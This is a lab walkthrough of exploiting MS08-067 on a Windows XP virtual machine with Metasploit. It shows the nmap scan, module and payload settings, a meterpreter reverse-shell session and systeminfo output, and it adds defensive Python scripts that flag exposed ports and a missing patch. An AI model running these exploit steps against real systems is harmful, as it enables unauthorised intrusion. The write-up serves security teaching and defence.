
MS08-067 exploitation

吕琪
2023-12-01


Lab environment

1. Kali Linux (IP: 192.168.131.131)

2. Windows XP (IP: 192.168.131.134)

Port scan

nmap 192.168.131.134

root@kali:~# nmap 192.168.131.134
Starting Nmap 7.70 ( https://nmap.org ) at 2020-09-10 14:17 CST
Nmap scan report for 192.168.131.134
Host is up (0.00010s latency).
Not shown: 995 closed ports
PORT     STATE SERVICE
23/tcp   open  telnet
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
3389/tcp open  ms-wbt-server
MAC Address: 00:0C:29:B1:96:23 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 3.06 seconds

High-risk ports such as 445 and 3389 are all found to be open.
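From the defender's side, the same nmap output is the starting point for an exposure check. The following script is an added example (not part of the original post): it parses nmap's normal-format output and flags open ports that a legacy host should not expose, with 445 (SMB, the Server service that MS08-067 lives in) and 3389 (RDP) among them. The scan text is embedded as a constructed sample copied from the output above, and the risk table is this script's own assumed policy.

```python
import re

# Constructed sample: the nmap output from the walkthrough, embedded so the script runs offline.
SAMPLE_NMAP = """\
Starting Nmap 7.70 ( https://nmap.org ) at 2020-09-10 14:17 CST
Nmap scan report for 192.168.131.134
Host is up (0.00010s latency).
Not shown: 995 closed ports
PORT     STATE SERVICE
23/tcp   open  telnet
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
3389/tcp open  ms-wbt-server
MAC Address: 00:0C:29:B1:96:23 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 3.06 seconds
"""

# Assumed policy: ports a defender should not see exposed on an unpatched legacy host.
# The annotations are this script's own, not taken from the original post.
HIGH_RISK_PORTS = {
    23: "telnet: cleartext credentials on the wire",
    135: "msrpc: RPC endpoint mapper, lateral-movement surface",
    139: "netbios-ssn: legacy SMB over NetBIOS",
    445: "microsoft-ds: SMB, the Server service targeted by MS08-067",
    3389: "ms-wbt-server: RDP reachable from the network",
}

PORT_LINE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)", re.M)
HOST_LINE = re.compile(r"^Nmap scan report for (\S+)", re.M)


def parse_nmap(text):
    """Return (host, [(port, proto, state, service), ...]) from normal-format nmap output."""
    m = HOST_LINE.search(text)
    host = m.group(1) if m else None
    ports = [(int(p), proto, state, svc) for p, proto, state, svc in PORT_LINE.findall(text)]
    return host, ports


def flag_exposures(text, risky=HIGH_RISK_PORTS):
    """Return one finding per open port that appears in the risk table."""
    host, ports = parse_nmap(text)
    findings = []
    for port, proto, state, svc in ports:
        if state == "open" and port in risky:
            findings.append({"host": host, "port": port, "service": svc, "why": risky[port]})
    return findings


if __name__ == "__main__":
    for f in flag_exposures(SAMPLE_NMAP):
        print(f"{f['host']}:{f['port']} ({f['service']}) - {f['why']}")
```

Run over a real `nmap -oN` file, the findings list is what goes into a patch-verification or firewall-review ticket; every port in the sample is flagged, which is exactly the picture the walkthrough exploits next.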

Exploitation

1. Open msf and search for ms08-067 (command: search 08-067)

[i] Database already started
[i] The database appears to be already configured, skipping initialization
                                                  

      .:okOOOkdc'           'cdkOOOko:.
    .xOOOOOOOOOOOOc       cOOOOOOOOOOOOx.
   :OOOOOOOOOOOOOOOk,   ,kOOOOOOOOOOOOOOO:
  'OOOOOOOOOkkkkOOOOO: :OOOOOOOOOOOOOOOOOO'
  oOOOOOOOO.MMMM.oOOOOoOOOOl.MMMM,OOOOOOOOo
  dOOOOOOOO.MMMMMM.cOOOOOc.MMMMMM,OOOOOOOOx
  lOOOOOOOO.MMMMMMMMM;d;MMMMMMMMM,OOOOOOOOl
  .OOOOOOOO.MMM.;MMMMMMMMMMM;MMMM,OOOOOOOO.
   cOOOOOOO.MMM.OOc.MMMMM'oOO.MMM,OOOOOOOc
    oOOOOOO.MMM.OOOO.MMM:OOOO.MMM,OOOOOOo
     lOOOOO.MMM.OOOO.MMM:OOOO.MMM,OOOOOl
      ;OOOO'MMM.OOOO.MMM:OOOO.MMM;OOOO;
       .dOOo'WM.OOOOocccxOOOO.MX'xOOd.
         ,kOl'M.OOOOOOOOOOOOO.M'dOk,
           :kk;.OOOOOOOOOOOOO.;Ok:
             ;kOOOOOOOOOOOOOOOk:
               ,xOOOOOOOOOOOx,
                 .lOOOOOOOl.
                    ,dOd,
                      .

       =[ metasploit v4.17.3-dev                          ]
+ -- --=[ 1795 exploits - 1019 auxiliary - 310 post       ]
+ -- --=[ 538 payloads - 41 encoders - 10 nops            ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]

msf > search 08-067

Matching Modules
================

   Name                                 Disclosure Date  Rank   Description
   ----                                 ---------------  ----   -----------
   exploit/windows/smb/ms08_067_netapi  2008-10-28       great  MS08-067 Microsoft Server Service Relative Path Stack Corruption


msf > 

 

2. One usable exploit module is found; load it (command: use exploit/windows/smb/ms08_067_netapi)

msf > use exploit/windows/smb/ms08_067_netapi 
msf exploit(windows/smb/ms08_067_netapi) >

3. Show the options the exploit module requires (command: show options)

msf exploit(windows/smb/ms08_067_netapi) > show options

Module options (exploit/windows/smb/ms08_067_netapi):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOST                     yes       The target address
   RPORT    445              yes       The SMB service port (TCP)
   SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)


Exploit target:

   Id  Name
   --  ----
   0   Automatic Targeting


msf exploit(windows/smb/ms08_067_netapi) > 

4. Set the target host (command: set rhost 192.168.131.134)

msf exploit(windows/smb/ms08_067_netapi) > set rhost 192.168.131.134
rhost => 192.168.131.134
msf exploit(windows/smb/ms08_067_netapi) >

5. Set a payload (a payload commonly used against Windows: windows/meterpreter/reverse_tcp) (command: set payload windows/meterpreter/reverse_tcp)

msf exploit(windows/smb/ms08_067_netapi) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(windows/smb/ms08_067_netapi) > 

6. Show the options again, now including those the payload requires (command: show options)

msf exploit(windows/smb/ms08_067_netapi) > show options 

Module options (exploit/windows/smb/ms08_067_netapi):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOST    192.168.131.134  yes       The target address
   RPORT    445              yes       The SMB service port (TCP)
   SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST                      yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic Targeting


msf exploit(windows/smb/ms08_067_netapi) >

7. The local listener IP still needs to be set (command: set lhost 192.168.131.131)

msf exploit(windows/smb/ms08_067_netapi) > set lhost 192.168.131.131
lhost => 192.168.131.131
msf exploit(windows/smb/ms08_067_netapi) > 

8. If the target host's operating system cannot be determined, target can be left unset; it is left unset here and the default configuration (Automatic Targeting) is used.

9. Launch the attack (command: exploit)

msf exploit(windows/smb/ms08_067_netapi) > exploit 

[*] Started reverse TCP handler on 192.168.131.131:4444 
[*] 192.168.131.134:445 - Automatically detecting the target...
[*] 192.168.131.134:445 - Fingerprint: Windows XP - Service Pack 3 - lang:English
[*] 192.168.131.134:445 - Selected Target: Windows XP SP3 English (AlwaysOn NX)
[*] 192.168.131.134:445 - Attempting to trigger the vulnerability...
[*] Sending stage (179779 bytes) to 192.168.131.134
[*] Meterpreter session 1 opened (192.168.131.131:4444 -> 192.168.131.134:1040) at 2020-09-10 14:25:53 +0800

meterpreter > 

10. Get a shell and view host information (shell, systeminfo)

meterpreter > shell
Process 380 created.
Channel 1 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>systeminfo
systeminfo

Host Name:                 Z-64EC8C23799B4
OS Name:                   Microsoft Windows XP Professional
OS Version:                5.1.2600 Service Pack 3 Build 2600
OS Manufacturer:           Microsoft Corporation
OS Configuration:          Standalone Workstation
OS Build Type:             Uniprocessor Free
Registered Owner:          Z Y H
Registered Organization:   
Product ID:                76487-011-0652134-22807
Original Install Date:     8/25/2020, 11:09:41 AM
System Up Time:            0 Days, 0 Hours, 30 Minutes, 29 Seconds
System Manufacturer:       VMware, Inc.
System Model:              VMware Virtual Platform
System type:               X86-based PC
Processor(s):              1 Processor(s) Installed.
                           [01]: x86 Family 6 Model 142 Stepping 10 GenuineIntel ~1992 Mhz
BIOS Version:              INTEL  - 6040000
Windows Directory:         C:\WINDOWS
System Directory:          C:\WINDOWS\system32
Boot Device:               \Device\HarddiskVolume1
System Locale:             en-us;English (United States)
Input Locale:              en-us;English (United States)
Time Zone:                 (GMT+08:00) Beijing, Chongqing, Hong Kong, Urumqi
Total Physical Memory:     511 MB
Available Physical Memory: 350 MB
Virtual Memory: Max Size:  2,048 MB
Virtual Memory: Available: 2,004 MB
Virtual Memory: In Use:    44 MB
Page File Location(s):     C:\pagefile.sys
Domain:                    WORKGROUP
Logon Server:              N/A
Hotfix(s):                 1 Hotfix(s) Installed.
                           [01]: Q147222
NetWork Card(s):           1 NIC(s) Installed.
                           [01]: VMware Accelerated AMD PCNet Adapter
                                 Connection Name: Local Area Connection
                                 DHCP Enabled:    Yes
                                 DHCP Server:     192.168.131.254
                                 IP address(es)
                                 [01]: 192.168.131.134

C:\WINDOWS\system32>

Shell obtained successfully.
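The systeminfo output above also tells a defender why this host fell: the only hotfix listed is Q147222, and the MS08-067 fix, shipped as security update KB958644 (a public bulletin fact, not something the post states), is absent. The following script is an added example (not part of the original post) that parses systeminfo output, extracts the OS version and installed hotfix list, and reports whether a host is in the affected version range and missing KB958644. The input is a constructed sample trimmed from the output above; the affected-version prefixes are this script's own assumption.

```python
import re

# Constructed sample: the systeminfo output shown above, trimmed to the fields this script reads.
SAMPLE_SYSTEMINFO = """\
Host Name:                 Z-64EC8C23799B4
OS Name:                   Microsoft Windows XP Professional
OS Version:                5.1.2600 Service Pack 3 Build 2600
System type:               X86-based PC
Hotfix(s):                 1 Hotfix(s) Installed.
                           [01]: Q147222
NetWork Card(s):           1 NIC(s) Installed.
                           [01]: VMware Accelerated AMD PCNet Adapter
"""

# MS08-067 shipped as security update KB958644.
MS08_067_KB = "KB958644"

# Assumed scope: NT kernel versions that the MS08-067 bulletin covered
# (Windows 2000, XP, Server 2003, Vista / Server 2008).
AFFECTED_VERSION_PREFIXES = ("5.0", "5.1", "5.2", "6.0")

HOTFIX_ENTRY = re.compile(r"^\s+\[\d+\]:\s*(\S+)")


def parse_systeminfo(text):
    """Return a dict with os_name, os_version and the list of installed hotfix ids.

    systeminfo prints top-level fields unindented and continuation entries
    indented with "[nn]:", so the hotfix block is read until the next top-level field.
    """
    info = {"os_name": None, "os_version": None, "hotfixes": []}
    in_hotfix_block = False
    for line in text.splitlines():
        if not line.startswith((" ", "\t")):
            # A new top-level field; the hotfix block (if any) ends here.
            in_hotfix_block = line.startswith("Hotfix(s):")
            if line.startswith("OS Name:"):
                info["os_name"] = line.split(":", 1)[1].strip()
            elif line.startswith("OS Version:"):
                info["os_version"] = line.split(":", 1)[1].strip()
            continue
        if in_hotfix_block:
            m = HOTFIX_ENTRY.match(line)
            if m:
                info["hotfixes"].append(m.group(1).upper())
    return info


def ms08_067_status(text):
    """Classify a host as 'not-affected', 'patched' or 'vulnerable' from its systeminfo output."""
    info = parse_systeminfo(text)
    version = info["os_version"] or ""
    if not version.startswith(AFFECTED_VERSION_PREFIXES):
        return "not-affected"
    return "patched" if MS08_067_KB in info["hotfixes"] else "vulnerable"


if __name__ == "__main__":
    info = parse_systeminfo(SAMPLE_SYSTEMINFO)
    print(info["os_name"], "/", info["os_version"])
    print("hotfixes:", info["hotfixes"])
    print("MS08-067:", ms08_067_status(SAMPLE_SYSTEMINFO))
```

The hotfix list systeminfo prints is a strong but not definitive signal: an update applied through a path that did not register its uninstall entry will not appear, so a "vulnerable" verdict should be confirmed against the file version of netapi32.dll, which is the binary the KB958644 update replaced. Collecting `systeminfo` from a fleet and running it through this check is a cheap way to find the hosts that still need the patch or network isolation before an attacker finds them with the walkthrough above.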
